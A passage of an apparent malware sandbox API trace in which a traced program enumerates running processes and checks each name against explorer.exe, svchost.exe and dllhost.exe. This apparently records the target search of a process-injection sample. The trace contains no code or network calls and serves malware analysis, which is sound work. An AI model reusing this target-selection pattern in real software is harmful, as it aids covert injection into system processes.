lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0224.851] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0224.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0224.851] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0224.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0224.852] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.852] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.852] CloseHandle (hObject=0xec) returned 1 [0224.852] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0224.852] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0224.852] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0224.852] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0224.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0224.852] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.852] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.853] CloseHandle (hObject=0xec) returned 1 [0224.853] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0224.853] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0224.853] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0224.853] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0224.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0224.853] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.853] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.853] CloseHandle (hObject=0xec) returned 1 [0224.854] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0224.854] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0224.854] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0224.854] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0224.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0224.854] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.854] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.854] CloseHandle (hObject=0xec) returned 1 [0224.854] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0224.854] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0224.854] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0224.854] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0224.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0224.855] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.855] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.855] CloseHandle (hObject=0xec) returned 1 [0224.855] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0224.855] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0224.855] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0224.855] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0224.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0224.855] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.855] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.856] CloseHandle (hObject=0xec) returned 1 [0224.856] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0224.856] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0224.856] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0224.856] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0224.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0224.856] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.856] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.856] CloseHandle (hObject=0xec) returned 1 [0224.856] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0224.856] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0224.856] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0224.856] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0224.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0224.857] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.857] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.857] CloseHandle (hObject=0xec) returned 1 [0224.857] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0224.857] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0224.857] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0224.857] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0224.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0224.858] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.858] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.858] CloseHandle (hObject=0xec) returned 1 [0224.858] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0224.858] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0224.858] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0224.858] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0224.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0224.858] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.858] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.858] CloseHandle (hObject=0xec) returned 1 [0224.858] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0224.858] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0224.858] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0224.858] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0224.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0224.859] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.859] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.859] CloseHandle (hObject=0xec) returned 1 [0224.859] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0224.859] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0224.859] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0224.859] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0224.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0224.860] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.860] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.860] CloseHandle (hObject=0xec) returned 1 [0224.860] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0224.860] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0224.860] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0224.860] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0224.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0224.860] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.860] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.860] CloseHandle (hObject=0xec) returned 1 [0224.861] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0224.861] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0224.861] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0224.861] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0224.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0224.861] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.861] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.861] CloseHandle (hObject=0xec) returned 1 [0224.861] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0224.861] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0224.861] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0224.861] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0224.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0224.862] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.862] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.862] CloseHandle (hObject=0xec) returned 1 [0224.862] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0224.862] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0224.862] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0224.862] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0224.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0224.862] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.862] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.863] CloseHandle (hObject=0xec) returned 1 [0224.863] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0224.863] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0224.863] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0224.863] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0224.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0224.863] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.863] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.863] CloseHandle (hObject=0xec) returned 1 [0224.863] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0224.863] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0224.863] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0224.863] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0224.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0224.864] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.864] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.864] CloseHandle (hObject=0xec) returned 1 [0224.864] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0224.864] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0224.864] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0224.864] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0224.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0224.865] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.865] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.865] CloseHandle (hObject=0xec) returned 1 [0224.865] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0224.865] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0224.865] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0224.865] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0224.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0224.865] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.865] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.865] CloseHandle (hObject=0xec) returned 1 [0224.865] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0224.866] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0224.866] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0224.866] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0224.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0224.866] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.866] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.866] CloseHandle (hObject=0xec) returned 1 [0224.866] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0224.866] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0224.866] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0224.866] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0224.867] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0224.867] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0224.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0224.868] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0224.868] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0224.869] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0224.869] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.869] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.870] CloseHandle (hObject=0xec) returned 1 [0224.870] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0224.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0224.870] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.870] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.870] CloseHandle (hObject=0xec) returned 1 [0224.870] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0224.871] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0224.872] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.872] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.872] CloseHandle (hObject=0xec) returned 1 [0224.872] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0224.872] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0224.872] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.872] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.872] CloseHandle (hObject=0xec) returned 1 [0224.872] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.873] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0224.873] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.873] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.873] 